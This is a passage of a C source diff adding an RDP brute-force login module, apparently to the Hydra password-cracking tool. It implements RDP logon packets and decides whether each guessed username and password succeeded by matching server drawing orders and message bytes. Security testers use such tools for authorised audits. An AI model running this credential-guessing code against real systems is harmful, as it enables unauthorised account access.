in_uint32_le(s, ignorelen); + DEBUG_RDP5(("Ignored Certificate length is %d\n", ignorelen)); + ignorecert = ssl_cert_read(s->p, ignorelen); + in_uint8s(s, ignorelen); + if (ignorecert == NULL) { /* XXX: error out? */ + DEBUG_RDP5(("got a bad cert: this will probably screw up the rest of the communication\n")); + } +#ifdef WITH_DEBUG_RDP5 + DEBUG_RDP5(("cert #%d (ignored):\n", certcount)); + ssl_cert_print_fp(stdout, ignorecert); +#endif + } + /* Do da funky X.509 stuffy + + "How did I find out about this? I looked up and saw a + bright light and when I came to I had a scar on my forehead + and knew about X.500" + - Peter Gutman in a early version of + http://www.cs.auckland.ac.nz/~pgut001/pubs/x509guide.txt + */ + in_uint32_le(s, cacert_len); + DEBUG_RDP5(("CA Certificate length is %d\n", cacert_len)); + cacert = ssl_cert_read(s->p, cacert_len); + in_uint8s(s, cacert_len); + if (NULL == cacert) { + error("Couldn't load CA Certificate from server\n"); + return False; + } + in_uint32_le(s, cert_len); + DEBUG_RDP5(("Certificate length is %d\n", cert_len)); + server_cert = ssl_cert_read(s->p, cert_len); + in_uint8s(s, cert_len); + if (NULL == server_cert) { + ssl_cert_free(cacert); + error("Couldn't load Certificate from server\n"); + return False; + } + ssl_cert_free(cacert); + in_uint8s(s, 16); /* Padding */ + server_public_key = ssl_cert_to_rkey(server_cert, &g_server_public_key_len); + if (NULL == server_public_key) { + DEBUG_RDP5(("Didn't parse X509 correctly\n")); + ssl_cert_free(server_cert); + return False; + } + ssl_cert_free(server_cert); + if ((g_server_public_key_len < SEC_MODULUS_SIZE) || (g_server_public_key_len > SEC_MAX_MODULUS_SIZE)) { + error("Bad server public key size (%u bits)\n", g_server_public_key_len * 8); + ssl_rkey_free(server_public_key); + return False; + } + if (ssl_rkey_get_exp_mod(server_public_key, exponent, SEC_EXPONENT_SIZE, modulus, SEC_MAX_MODULUS_SIZE) != 0) { + error("Problem extracting RSA exponent, modulus"); + ssl_rkey_free(server_public_key); + return False; + } + ssl_rkey_free(server_public_key); + return True; /* There's some garbage here we don't care about */ + } + return s_check_end(s); +} + +/* Process crypto information blob */ +static void sec_process_crypt_info(STREAM s) { + uint8 *server_random = NULL; + uint8 modulus[SEC_MAX_MODULUS_SIZE]; + uint8 exponent[SEC_EXPONENT_SIZE]; + uint32 rc4_key_size; + + memset(modulus, 0, sizeof(modulus)); + memset(exponent, 0, sizeof(exponent)); + if (!sec_parse_crypt_info(s, &rc4_key_size, &server_random, modulus, exponent)) { + DEBUG(("Failed to parse crypt info\n")); + return; + } + DEBUG(("Generating client random\n")); + generate_random(g_client_random); + sec_rsa_encrypt(g_sec_crypted_random, g_client_random, SEC_RANDOM_SIZE, g_server_public_key_len, modulus, exponent); + sec_generate_keys(g_client_random, server_random, rc4_key_size); +} + + +/* Process SRV_INFO, find RDP version supported by server */ +static void sec_process_srv_info(STREAM s) { + in_uint16_le(s, g_server_rdp_version); + if (verbose) + hydra_report(stderr, "[VERBOSE] Server RDP version is %d\n", g_server_rdp_version); + if (1 == g_server_rdp_version) { + g_use_rdp5 = 0; + g_server_depth = 8; + } +} + + +/* Process connect response data blob */ +void sec_process_mcs_data(STREAM s) { + uint16 tag, length; + uint8 *next_tag; + uint8 len; + + in_uint8s(s, 21); /* header (T.124 ConferenceCreateResponse) */ + in_uint8(s, len); + if (len & 0x80) + in_uint8(s, len); + + while (s->p < s->end) { + in_uint16_le(s, tag); + in_uint16_le(s, length); + + if (length <= 4) + return; + + next_tag = s->p + length - 4; + + switch (tag) { + case SEC_TAG_SRV_INFO: + sec_process_srv_info(s); + break; + + case SEC_TAG_SRV_CRYPT: + sec_process_crypt_info(s); + break; + + case SEC_TAG_SRV_CHANNELS: + break; + + default: + unimpl("response tag 0x%x\n", tag); + } + + s->p = next_tag; + } +} + +/* Receive secure transport packet */ +STREAM sec_recv(uint8 * rdpver) { + uint32 sec_flags; + uint16 channel = 0; + STREAM s; + + while ((s = mcs_recv(&channel, rdpver)) != NULL) { + if (rdpver != NULL) { + if (*rdpver != 3) { + if (*rdpver & 0x80) { + in_uint8s(s, 8); /* signature */ + sec_decrypt(s->p, s->end - s->p); + } + return s; + } + } + //if (g_encryption || !g_licence_issued) + if (g_encryption) { + in_uint32_le(s, sec_flags); + + if (sec_flags & SEC_ENCRYPT) { + in_uint8s(s, 8); /* signature */ + sec_decrypt(s->p, s->end - s->p); + } + + if (sec_flags & SEC_LICENCE_NEG) { + //licence_process(s); + continue; + } + + if (sec_flags & 0x0400) { /* SEC_REDIRECT_ENCRYPT */ + uint8 swapbyte; + + in_uint8s(s, 8); /* signature */ + sec_decrypt(s->p, s->end - s->p); + + /* Check for a redirect packet, starts with 00 04 */ + if (s->p[0] == 0 && s->p[1] == 4) { + /* for some reason the PDU and the length seem to be swapped. + This isn't good, but we're going to do a byte for byte + swap. So the first foure value appear as: 00 04 XX YY, + where XX YY is the little endian length. We're going to + use 04 00 as the PDU type, so after our swap this will look + like: XX YY 04 00 */ + swapbyte = s->p[0]; + s->p[0] = s->p[2]; + s->p[2] = swapbyte; + + swapbyte = s->p[1]; + s->p[1] = s->p[3]; + s->p[3] = swapbyte; + + swapbyte = s->p[2]; + s->p[2] = s->p[3]; + s->p[3] = swapbyte; + } +#ifdef WITH_DEBUG + /* warning! this debug statement will show passwords in the clear! */ + hexdump(s->p, s->end - s->p); +#endif + } + + } + + if (channel != MCS_GLOBAL_CHANNEL) { + if (rdpver != NULL) + *rdpver = 0xff; + return s; + } + + return s; + } + + return NULL; +} + +/* Establish a secure connection */ +BOOL sec_connect(char *server, char *username, BOOL reconnect) { + struct stream mcs_data; + + /* We exchange some RDP data during the MCS-Connect */ + mcs_data.size = 512; + mcs_data.end = mcs_data.p = mcs_data.data = (uint8 *) xmalloc(mcs_data.size); + sec_out_mcs_data(&mcs_data); + + if (!mcs_connect(server, &mcs_data, username, reconnect)) + return False; + if (g_encryption) + sec_establish_key(); + free(mcs_data.data); + mcs_data.data = NULL; + return True; +} + +/* Disconnect a connection */ +void sec_disconnect(void) { + mcs_disconnect(); +} + +/* reset the state of the sec layer */ +void sec_reset_state(void) { + g_server_rdp_version = 0; + g_sec_encrypt_use_count = 0; + g_sec_decrypt_use_count = 0; + mcs_reset_state(); +} + + + +/* Read field indicating which parameters are present */ +static void rdp_in_present(STREAM s, uint32 * present, uint8 flags, int size) { + uint8 bits; + int i; + + if (flags & RDP_ORDER_SMALL) { + size--; + } + + if (flags & RDP_ORDER_TINY) { + if (size < 2) + size = 0; + else + size -= 2; + } + + *present = 0; + for (i = 0; i < size; i++) { + in_uint8(s, bits); + *present |= bits << (i * 8); + } +} + +/* Read a co-ordinate (16-bit, or 8-bit delta) */ +static void rdp_in_coord(STREAM s, sint16 * coord, BOOL delta) { + sint8 change; + + if (delta) { + in_uint8(s, change); + *coord += change; + } else { + in_uint16_le(s, *coord); + } +} + +/* Read a colour entry */ +static void rdp_in_colour(STREAM s, uint32 * colour) { + uint32 i; + + in_uint8(s, i); + *colour = i; + in_uint8(s, i); + *colour |= i << 8; + in_uint8(s, i); + *colour |= i << 16; +} + +/* Parse bounds information */ +static BOOL rdp_parse_bounds(STREAM s, BOUNDS * bounds) { + uint8 present; + + in_uint8(s, present); + + if (present & 1) + rdp_in_coord(s, &bounds->left, False); + else if (present & 16) + rdp_in_coord(s, &bounds->left, True); + + if (present & 2) + rdp_in_coord(s, &bounds->top, False); + else if (present & 32) + rdp_in_coord(s, &bounds->top, True); + + if (present & 4) + rdp_in_coord(s, &bounds->right, False); + else if (present & 64) + rdp_in_coord(s, &bounds->right, True); + + if (present & 8) + rdp_in_coord(s, &bounds->bottom, False); + else if (present & 128) + rdp_in_coord(s, &bounds->bottom, True); + + return s_check(s); +} + +/* Process an opaque rectangle order */ +static void process_rect(STREAM s, RECT_ORDER * os, uint32 present, BOOL delta) { + uint32 i; + + if (present & 0x01) + rdp_in_coord(s, &os->x, delta); + + if (present & 0x02) + rdp_in_coord(s, &os->y, delta); + + if (present & 0x04) + rdp_in_coord(s, &os->cx, delta); + + if (present & 0x08) + rdp_in_coord(s, &os->cy, delta); + + if (present & 0x10) { + in_uint8(s, i); + os->colour = (os->colour & 0xffffff00) | i; + } + + if (present & 0x20) { + in_uint8(s, i); + os->colour = (os->colour & 0xffff00ff) | (i << 8); + } + + if (present & 0x40) { + in_uint8(s, i); + os->colour = (os->colour & 0xff00ffff) | (i << 16); + } + + DEBUG(("RECT(x=%d,y=%d,cx=%d,cy=%d,fg=0x%x)\n", os->x, os->y, os->cx, os->cy, os->colour)); +} + +/* Process a desktop save order */ +static void process_desksave(STREAM s, DESKSAVE_ORDER * os, uint32 present, BOOL delta) { + int width, height; + + if (present & 0x01) + in_uint32_le(s, os->offset); + + if (present & 0x02) + rdp_in_coord(s, &os->left, delta); + + if (present & 0x04) + rdp_in_coord(s, &os->top, delta); + + if (present & 0x08) + rdp_in_coord(s, &os->right, delta); + + if (present & 0x10) + rdp_in_coord(s, &os->bottom, delta); + + if (present & 0x20) + in_uint8(s, os->action); + + DEBUG(("DESKSAVE(l=%d,t=%d,r=%d,b=%d,off=%d,op=%d)\n", os->left, os->top, os->right, os->bottom, os->offset, os->action)); + + width = os->right - os->left + 1; + height = os->bottom - os->top + 1; +} + +/* Process a memory blt order */ +static void process_memblt(STREAM s, MEMBLT_ORDER * os, uint32 present, BOOL delta) { + //on win 7, vista, 2008, the login failed has to be catched here + if (present & 0x0001) { + in_uint8(s, os->cache_id); + in_uint8(s, os->colour_table); + } + + if (present & 0x0002) + rdp_in_coord(s, &os->x, delta); + + if (present & 0x0004) + rdp_in_coord(s, &os->y, delta); + + if (present & 0x0008) + rdp_in_coord(s, &os->cx, delta); + + if (present & 0x0010) + rdp_in_coord(s, &os->cy, delta); + + if (present & 0x0020) + in_uint8(s, os->opcode); + + if (present & 0x0040) + rdp_in_coord(s, &os->srcx, delta); + + if (present & 0x0080) + rdp_in_coord(s, &os->srcy, delta); + + if (present & 0x0100) + in_uint16_le(s, os->cache_idx); + + DEBUG(("MEMBLT(op=0x%x,x=%d,y=%d,cx=%d,cy=%d,id=%d,idx=%d)\n", os->opcode, os->x, os->y, os->cx, os->cy, os->cache_id, os->cache_idx)); + //MEMBLT(op=0xcc,x=640,y=128,cx=64,cy=64,id=2,idx=117) => win8 failed + + if ((os->opcode == 0xcc && os->x == 740 && os->y == 448 && os->cx == 60 && os->cy == 56 && os->cache_id == 2) || + (os->opcode == 0xcc && os->x == 640 && os->y == 128 && os->cx == 64 && os->cy == 64 && os->cache_id == 2 && os->cache_idx > 100)) { + if (debug) + hydra_report(stderr, "[DEBUG] Login failed from process_memblt\n"); + login_result = LOGIN_FAIL; + } +} + +/* Process a text order */ +static void process_text2(STREAM s, TEXT2_ORDER * os, uint32 present, BOOL delta) { + int i; + + if (present & 0x000001) + in_uint8(s, os->font); + + if (present & 0x000002) + in_uint8(s, os->flags); + + if (present & 0x000004) + in_uint8(s, os->opcode); + + if (present & 0x000008) + in_uint8(s, os->mixmode); + + if (present & 0x000010) + rdp_in_colour(s, &os->fgcolour); + + if (present & 0x000020) + rdp_in_colour(s, &os->bgcolour); + + if (present & 0x000040) + in_uint16_le(s, os->clipleft); + + if (present & 0x000080) + in_uint16_le(s, os->cliptop); + + if (present & 0x000100) + in_uint16_le(s, os->clipright); + + if (present & 0x000200) + in_uint16_le(s, os->clipbottom); + + if (present & 0x000400) + in_uint16_le(s, os->boxleft); + + if (present & 0x000800) + in_uint16_le(s, os->boxtop); + + if (present & 0x001000) + in_uint16_le(s, os->boxright); + + if (present & 0x002000) + in_uint16_le(s, os->boxbottom); + + //rdp_parse_brush(s, &os->brush, present >> 14); + + if (present & 0x080000) + in_uint16_le(s, os->x); + + if (present & 0x100000) + in_uint16_le(s, os->y); + + if (present & 0x200000) { + in_uint8(s, os->length); + in_uint8a(s, os->text, os->length); + } + //printf("TEXT2(x=%d,y=%d,cl=%d,ct=%d,cr=%d,cb=%d,bl=%d,bt=%d,br=%d,bb=%d,bs=%d,bg=0x%x,fg=0x%x,font=%d,fl=0x%x,op=0x%x,mix=%d,n=%d)\n", os->x, os->y, os->clipleft, os->cliptop, os->clipright, os->clipbottom, os->boxleft, os->boxtop, os->boxright, os->boxbottom, , os->bgcolour, os->fgcolour, os->font, os->flags, os->opcode, os->mixmode, os->length); + + if (debug) { + printf("[DEBUG] process_text2: "); + + for (i = 0; i < os->length; i++) + printf("%02x ", os->text[i]); + printf(" *** "); + + printf("size: %d\n", os->length); + } + //there is no way to determine if the message from w2k is a success or failure at first + //so we identify it here and set the os version as win 2000 same for win2k3 + if (!memcmp(os->text, LOGON_MESSAGE_2K, 31)) { + os_version = 2000; + } + if (!memcmp(os->text, LOGON_MESSAGE_FAILED_2K3, 18)) { + os_version = 2003; + } + //on win2k, error can be fe 00 00 or fe 02 00 + if (((os->text[0] == 254) && (os->text[2] == 0)) || (!memcmp(os->text, LOGON_MESSAGE_FAILED_XP, 18))) { + if (debug) + hydra_report(stderr, "[DEBUG] login failed from process_text2\n"); + login_result = LOGIN_FAIL; + } else { + //if it's not an well known error and if it's not just traffic from win 2000 server + + if ((os_version == 2000) && (os->length > 50)) { + if (debug) + hydra_report(stderr, "[DEBUG] login success from process_text2\n"); + login_result = LOGIN_SUCC; + } + } +} + +/* Process a secondary order */ +static void process_secondary_order(STREAM s) { + /* The length isn't calculated correctly by the server. + * For very compact orders the length becomes negative + * so a signed integer must be used. */ + uint16 length; + uint16 flags; + uint8 type; + uint8 *next_order; + + in_uint16_le(s, length); + in_uint16_le(s, flags); /* used by bmpcache2 */ + in_uint8(s, type); + + next_order = s->p + (sint16) length + 7; + + /* + switch (type) + { + case RDP_ORDER_RAW_BMPCACHE: + break; + + case RDP_ORDER_COLCACHE: + break; + + case RDP_ORDER_BMPCACHE: + break; + + case RDP_ORDER_FONTCACHE: + process_fontcache(s); + break; + + case RDP_ORDER_RAW_BMPCACHE2: + break; + + case RDP_ORDER_BMPCACHE2: + break; + + case RDP_ORDER_BRUSHCACHE: + process_brushcache(s, flags); + break; + + default: + unimpl("secondary order %d\n", type); + } + */ + s->p = next_order; +} + +/* Process an order PDU */ +void process_orders(STREAM s, uint16 num_orders) { + RDP_ORDER_STATE *os = &g_order_state; + uint32 present; + uint8 order_flags; + int size, processed = 0; + BOOL delta; + + while (processed < num_orders) { + in_uint8(s, order_flags); + + if (os_version == 2003) + os_version = 0; + + if (!(order_flags & RDP_ORDER_STANDARD)) { + //error("order parsing failed\n"); + //we detected the os is a win 2000 version and the next text msg will be either an error LOGON_MESSAGE_FAILED_2K + //or any other traffic indicating the logon was successfull, so we reset the os_version and let process_text2 handle the msg + if (os_version == 2003) + login_result = LOGIN_SUCC; + break; + } + + if (order_flags & RDP_ORDER_SECONDARY) { + process_secondary_order(s); + } else { + if (order_flags & RDP_ORDER_CHANGE) { + in_uint8(s, os->order_type); + } + + switch (os->order_type) { + case RDP_ORDER_TRIBLT: + case RDP_ORDER_TEXT2: + size = 3; + break; + + case RDP_ORDER_PATBLT: + case RDP_ORDER_MEMBLT: + case RDP_ORDER_LINE: + case RDP_ORDER_POLYGON2: + case RDP_ORDER_ELLIPSE2: + size = 2; + break; + + default: + size = 1; + } + + rdp_in_present(s, &present, order_flags, size); + + if (order_flags & RDP_ORDER_BOUNDS) { + if (!(order_flags & RDP_ORDER_LASTBOUNDS)) + rdp_parse_bounds(s, &os->bounds); + + } + + delta = order_flags & RDP_ORDER_DELTA; + +//printf("order %d\n", os->order_type); + + if (login_result) + return; + + switch (os->order_type) { + + case RDP_ORDER_RECT: + process_rect(s, &os->rect, present, delta); + break; + + case RDP_ORDER_DESKSAVE: + process_desksave(s, &os->desksave, present, delta); + break; + + case RDP_ORDER_MEMBLT: + process_memblt(s, &os->memblt, present, delta); + break; + + case RDP_ORDER_TEXT2: + process_text2(s, &os->text2, present, delta); + break; + + default: + if (debug) + printf("[DEBUG] unknown order_type: %d\n", os->order_type); + + } + } + + processed++; + } +} + +/* Reset order state */ +void reset_order_state(void) { + memset(&g_order_state, 0, sizeof(g_order_state)); + g_order_state.order_type = RDP_ORDER_PATBLT; +} + +/* Disconnect from the RDP layer */ +void rdp_disconnect(void) { + sec_disconnect(); +} + + +void rdp5_process(STREAM s) { + uint16 length, count; + uint8 type, ctype; + uint8 *next; + + struct stream *ts; + + while (s->p < s->end) { + in_uint8(s, type); + if (type & RDP5_COMPRESSED) { + in_uint8(s, ctype); + in_uint16_le(s, length); + type ^= RDP5_COMPRESSED; + } else { + ctype = 0; + in_uint16_le(s, length); + } + g_next_packet = next = s->p + length; + ts = s; +//printf("type: %d\n", type); + switch (type) { + case 0: /* update orders */ + in_uint16_le(ts, count); + process_orders(ts, count); + break; + + } + + s->p = next; + } +} + + +/* Receive an RDP packet */ +static STREAM rdp_recv(uint8 * type) { + static STREAM rdp_s; + uint16 length, pdu_type; + uint8 rdpver; + + if ((rdp_s == NULL) || (g_next_packet >= rdp_s->end) || (g_next_packet == NULL)) { + rdp_s = sec_recv(&rdpver); + if (rdp_s == NULL) + return NULL; + if (rdpver == 0xff) { + g_next_packet = rdp_s->end; + *type = 0; + return rdp_s; + } else if (rdpver != 3) { + /* rdp5_process should move g_next_packet ok */ + rdp5_process(rdp_s); + *type = 0; + return rdp_s; + } + + g_next_packet = rdp_s->p; + } else { + rdp_s->p = g_next_packet; + } + + in_uint16_le(rdp_s, length); + /* 32k packets are really 8, keepalive fix */ + if (length == 0x8000) { + g_next_packet += 8; + *type = 0; + return rdp_s; + } + in_uint16_le(rdp_s, pdu_type); + in_uint8s(rdp_s, 2); /* userid */ + *type = pdu_type & 0xf; + + g_next_packet += length; + return rdp_s; +} + +/* used in uiports and rdp_main_loop, processes the rdp packets waiting */ +BOOL rdp_loop(BOOL * deactivated, uint32 * ext_disc_reason) { + uint8 type; + BOOL cont = True; + STREAM s; + + while (cont) { + s = rdp_recv(&type); + + if (s == NULL) + return False; + switch (type) { + case RDP_PDU_DEMAND_ACTIVE: + process_demand_active(s); + *deactivated = False; + break; + case RDP_PDU_DEACTIVATE: + DEBUG(("RDP_PDU_DEACTIVATE\n")); + *deactivated = True; + break; + case RDP_PDU_REDIRECT: + break; + case RDP_PDU_DATA: + process_data_pdu(s, ext_disc_reason); + break; + case 0: + break; + default: + unimpl("PDU %d\n", type); + } + cont = g_next_packet < s->end; + } + return True; +} + +/* Process incoming packets */ +int rdp_main_loop(BOOL * deactivated, uint32 * ext_disc_reason) { + while (rdp_loop(deactivated, ext_disc_reason)) { + if (login_result != LOGIN_UNKN) { + return login_result; + } + } + return 0; +} + + + +/* Parse a logon info packet */ +static void rdp_send_logon_info(uint32 flags, char *domain, char *user, char *password, char *program, char *directory) { + char *ipaddr = tcp_get_address(); + int len_domain = 2 * strlen(domain); + int len_user = 2 * strlen(user); + int len_password = 2 * strlen(password); + int len_program = 2 * strlen(program); + int len_directory = 2 * strlen(directory); + int len_ip = 2 * strlen(ipaddr); + int len_dll = 2 * strlen("C:\\WINNT\\System32\\mstscax.dll"); + int packetlen = 0; + uint32 sec_flags = g_encryption ? (SEC_LOGON_INFO | SEC_ENCRYPT) : SEC_LOGON_INFO; + STREAM s = NULL; + time_t t = time(NULL); + time_t tzone; + uint8 security_verifier[16]; + + if (!g_use_rdp5 || 1 == g_server_rdp_version) { + DEBUG_RDP5(("Sending RDP4-style Logon packet\n")); + + s = sec_init(sec_flags, 18 + len_domain + len_user + len_password + len_program + len_directory + 10); + + out_uint32(s, 0); + out_uint32_le(s, flags); + out_uint16_le(s, len_domain); + out_uint16_le(s, len_user); + out_uint16_le(s, len_password); + out_uint16_le(s, len_program); + out_uint16_le(s, len_directory); + rdp_out_unistr(s, domain, len_domain); + rdp_out_unistr(s, user, len_user); + rdp_out_unistr(s, password, len_password); + rdp_out_unistr(s, program, len_program); + rdp_out_unistr(s, directory, len_directory); + } else { + + flags |= RDP_LOGON_BLOB; + DEBUG_RDP5(("Sending RDP5-style Logon packet\n")); + packetlen = 4 + /* Unknown uint32 */ + 4 + /* flags */ + 2 + /* len_domain */ + 2 + /* len_user */ + (flags & RDP_LOGON_AUTO ? 2 : 0) + /* len_password */ + (flags & RDP_LOGON_BLOB && !(flags & RDP_LOGON_AUTO) ? 2 : 0) + /* Length of BLOB */ + 2 + /* len_program */ + 2 + /* len_directory */ + (0 < len_domain ? len_domain : 2) + /* domain */ + len_user + /* len user */ + (flags & RDP_LOGON_AUTO ? len_password : 0) + /* len pass */ + 0 + /* We have no 512 byte BLOB. Perhaps we must? */ + (flags & RDP_LOGON_BLOB && !(flags & RDP_LOGON_AUTO) ? 2 : 0) + /* After the BLOB is a unknown int16. If there is a BLOB, that is. */ + (0 < len_program ? len_program : 2) + /* program */ + (0 < len_directory ? len_directory : 2) + /* dir */ + 2 + /* Unknown (2) */ + 2 + /* Client ip length */ + len_ip + /* Client ip */ + 2 + /* DLL string length */ + len_dll + /* DLL string */ + 4 + /* zone */ + strlen("GTB, normaltid") * 2 + /* zonestring */ + 1 + /* len */ + 5 * 4 + /* some int32 */ + 2 * strlen("GTB, sommartid") + /* zonestring */ + 1 + /* len */ + 5 * 4 + /* some int32 */ + 2 * 4 + /* some int32 */ + (g_has_reconnect_random ? 14 + sizeof(security_verifier) : 2) + 105 + /* ??? we need this */ + 0; // end +//printf("pl: %d - flags %d - AUTO %d - BLOB %d\n", packetlen, flags, RDP_LOGON_AUTO, RDP_LOGON_BLOB); + + s = sec_init(sec_flags, packetlen); + DEBUG_RDP5(("Called sec_init with packetlen %d\n", packetlen)); + + out_uint32(s, 0); /* Unknown */ + out_uint32_le(s, flags); + out_uint16_le(s, len_domain); + out_uint16_le(s, len_user); + if (flags & RDP_LOGON_AUTO) { + out_uint16_le(s, len_password); + } + if (flags & RDP_LOGON_BLOB && !(flags & RDP_LOGON_AUTO)) { + out_uint16_le(s, 0); + } + out_uint16_le(s, len_program); + out_uint16_le(s, len_directory); + if (0 < len_domain) + rdp_out_unistr(s, domain, len_domain); + else + out_uint16_le(s, 0); + rdp_out_unistr(s, user, len_user); + if (flags & RDP_LOGON_AUTO) { + rdp_out_unistr(s, password, len_password); + } + if (flags & RDP_LOGON_BLOB && !(flags & RDP_LOGON_AUTO)) { + out_uint16_le(s, 0); + } + if (0 < len_program) { + rdp_out_unistr(s, program, len_program); + } else { + out_uint16_le(s, 0); + } + if (0 < len_directory) { + rdp_out_unistr(s, directory, len_directory); + } else { + out_uint16_le(s, 0); + } + /* TS_EXTENDED_INFO_PACKET */ + out_uint16_le(s, 2); /* clientAddressFamily = AF_INET */ + out_uint16_le(s, len_ip + 2); /* cbClientAddress, Length of client ip */ + rdp_out_unistr(s, ipaddr, len_ip); /* clientAddress */ + out_uint16_le(s, len_dll + 2); /* cbClientDir */ + rdp_out_unistr(s, "C:\\WINNT\\System32\\mstscax.dll", len_dll); /* clientDir */ + + /* TS_TIME_ZONE_INFORMATION */ + tzone = (mktime(gmtime(&t)) - mktime(localtime(&t))) / 60; + out_uint32_le(s, tzone); + rdp_out_unistr(s, "GTB, normaltid", 2 * strlen("GTB, normaltid")); + out_uint8s(s, 62 - 2 * strlen("GTB, normaltid")); + out_uint32_le(s, 0x0a0000); + out_uint32_le(s, 0x050000); + out_uint32_le(s, 3); + out_uint32_le(s, 0); + out_uint32_le(s, 0); + rdp_out_unistr(s, "GTB, sommartid", 2 * strlen("GTB, sommartid")); + out_uint8s(s, 62 - 2 * strlen("GTB, sommartid")); + out_uint32_le(s, 0x30000); + out_uint32_le(s, 0x050000); + out_uint32_le(s, 2); + out_uint32(s, 0); + out_uint32_le(s, 0xffffffc4); /* DaylightBias */ + + /* Rest of TS_EXTENDED_INFO_PACKET */ + out_uint32_le(s, 0xfffffffe); /* clientSessionId, consider changing to 0 */ + out_uint32_le(s, g_rdp5_performanceflags); + + /* Client Auto-Reconnect */ + if (g_has_reconnect_random) { + out_uint16_le(s, 28); /* cbAutoReconnectLen */ + /* ARC_CS_PRIVATE_PACKET */ + out_uint32_le(s, 28); /* cbLen */ + out_uint32_le(s, 1); /* Version */ + out_uint32_le(s, g_reconnect_logonid); /* LogonId */ + ssl_hmac_md5(g_reconnect_random, sizeof(g_reconnect_random), g_client_random, SEC_RANDOM_SIZE, security_verifier); + out_uint8a(s, security_verifier, sizeof(security_verifier)); + } else { + out_uint16_le(s, 0); /* cbAutoReconnectLen */ + } + + } + s_mark_end(s); + sec_send(s, sec_flags); +} + +/* Establish a connection up to the RDP layer */ +BOOL rdp_connect(char *server, uint32 flags, char *domain, char *login, char *password, char *command, char *directory, BOOL reconnect) { + + if (!sec_connect(server, login, reconnect)) + return False; + + rdp_send_logon_info(flags, domain, login, password, command, directory); + return True; +} + +int start_rdp(int s, char *ip, int port, unsigned char options, char *miscptr, FILE * fp) { + char *empty = ""; + char *login, *pass; + char server[64]; + char domain[256]; + char shell[256]; + char directory[256]; + BOOL deactivated = 0; + uint32 flags, ext_disc_reason = 0; + + flags = RDP_LOGON_NORMAL; + flags |= RDP_LOGON_AUTO; + + os_version = 0; + g_redirect = False; + g_redirect_flags = 0; + login_result = LOGIN_UNKN; + + shell[0] = directory[0] = 0; + memset(domain, 0, sizeof(domain)); + + if (strlen(login = hydra_get_next_login()) == 0) + login = empty; + if (strlen(pass = hydra_get_next_password()) == 0) + pass = empty; + + strcpy(server, hydra_address2string(ip)); + + if ((miscptr != NULL) && (strlen(miscptr) > 0)) { + strncpy(domain, miscptr, sizeof(domain)); + } + + if (!rdp_connect(server, flags, domain, login, pass, shell, directory, g_redirect)) + return 3; + + rdp_main_loop(&deactivated, &ext_disc_reason); + + if (login_result == LOGIN_SUCC) { + hydra_report_found_host(port, ip, "rdp", fp); + hydra_completed_pair_found(); + } else { + hydra_completed_pair(); + } + + rdp_disconnect(); + + if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0) + return 2; + return 1; + +} + +/* Client program */ +void service_rdp(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) { + int run = 1, next_run = 1; + int myport = PORT_RDP; + + hydra_register_socket(sp); + if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0) + return; + + while (1) { + next_run = 0; + switch (run) { + case 1: /* run the cracking function */ + rdesktop_reset_state(); + g_sock = hydra_connect_tcp(ip, myport); + if (g_sock < 0) { + hydra_report(stderr, "[ERROR] Child with pid %d terminating, can not connect\n", (int) getpid()); + hydra_child_exit(1); + } + next_run = start_rdp(g_sock, ip, port, options, miscptr, fp); + break; + case 2: /* clean exit */ + if (g_sock >= 0) + rdp_disconnect(); + hydra_child_exit(0); + return; + case 3: /* connection error case */ + hydra_child_exit(1); + return; + default: + hydra_report(stderr, "[ERROR] Caught unknown return code, exiting!\n"); + hydra_child_exit(2); + } + run = next_run; + } +} + +/* Generate a 32-byte random for the secure transport code. */ +void generate_random(uint8 * random) { + struct stat st; + struct tms tmsbuf; + SSL_MD5 md5; + uint32 *r; + int fd, n; + + /* If we have a kernel random device, try that first */ + if (((fd = open("/dev/urandom", O_RDONLY)) != -1) + || ((fd = open("/dev/random", O_RDONLY)) != -1)) { + n = read(fd, random, 32); + close(fd); + if (n == 32) + return; + } + + r = (uint32 *) random; + r[0] = (getpid()) | (getppid() << 16); + r[1] = (getuid()) | (getgid() << 16); + r[2] = times(&tmsbuf); /* system uptime (clocks) */ + gettimeofday((struct timeval *) &r[3], NULL); /* sec and usec */ + stat("/tmp", &st); + r[5] = st.st_atime; + r[6] = st.st_mtime; + r[7] = st.st_ctime; + + /* Hash both halves with MD5 to obscure possible patterns */ + ssl_md5_init(&md5); + ssl_md5_update(&md5, random, 16); + ssl_md5_final(&md5, random); + ssl_md5_update(&md5, random + 16, 16); + ssl_md5_final(&md5, random + 16); +} + +/* malloc; exit if out of memory */ +void *xmalloc(int size) { + void *mem = malloc(size); + + if (mem == NULL) { + error("xmalloc %d\n", size); + return NULL; + } + return mem; +} + +/* strdup */ +char *xstrdup(const char *s) { + char *mem = strdup(s); + + if (mem == NULL) { + perror("strdup"); + return NULL; + } + return mem; +} + +/* realloc; exit if out of memory */ +void *xrealloc(void *oldmem, size_t size) { + void *mem; + + if (size == 0) + size = 1; +//printf("---? %p %d\n", oldmem, size); + mem = realloc(oldmem, size); +//printf("---!\n"); + if (mem == NULL) { + error("xrealloc %ld\n", size); + return NULL; + } + return mem; +} + +/* report an error */ +void error(char *format, ...) { + va_list ap; + + fprintf(stderr, "[ERROR]: "); + + va_start(ap, format); + hydra_report(stderr, format, ap); + va_end(ap); +} + +/* report a warning */ +void warning(char *format, ...) { + if (verbose) { + va_list ap; + + fprintf(stderr, "[VERBOSE]: "); + + va_start(ap, format); + hydra_report(stderr, format, ap); + va_end(ap); + } +} + +/* report an unimplemented protocol feature */ +void unimpl(char *format, ...) { + if (debug) { + va_list ap; + + fprintf(stderr, "[DEBUG] not implemented: "); + + va_start(ap, format); + hydra_report(stderr, format, ap); + va_end(ap); + } +} + +/* produce a hex dump */ +void hexdump(unsigned char *p, unsigned int len) { + unsigned char *line = p; + int i, thisline, offset = 0; + + while (offset < len) { + printf("%04x ", offset); + thisline = len - offset; + if (thisline > 16) + thisline = 16; + + for (i = 0; i < thisline; i++) + printf("%02x ", line[i]); + + for (; i < 16; i++) + printf(" "); + + for (i = 0; i < thisline; i++) + printf("%c", (line[i] >= 0x20 && line[i] < 0x7f) ? line[i] : '.'); + + printf("\n"); + offset += thisline; + line += thisline; + } +} + +/* Initialise an RDP data packet */ +static STREAM rdp_init_data(int maxlen) { + STREAM s; + + s = sec_init(g_encryption ? SEC_ENCRYPT : 0, maxlen + 18); + s_push_layer(s, rdp_hdr, 18); + + return s; +} + +/* Send an RDP data packet */ +static void 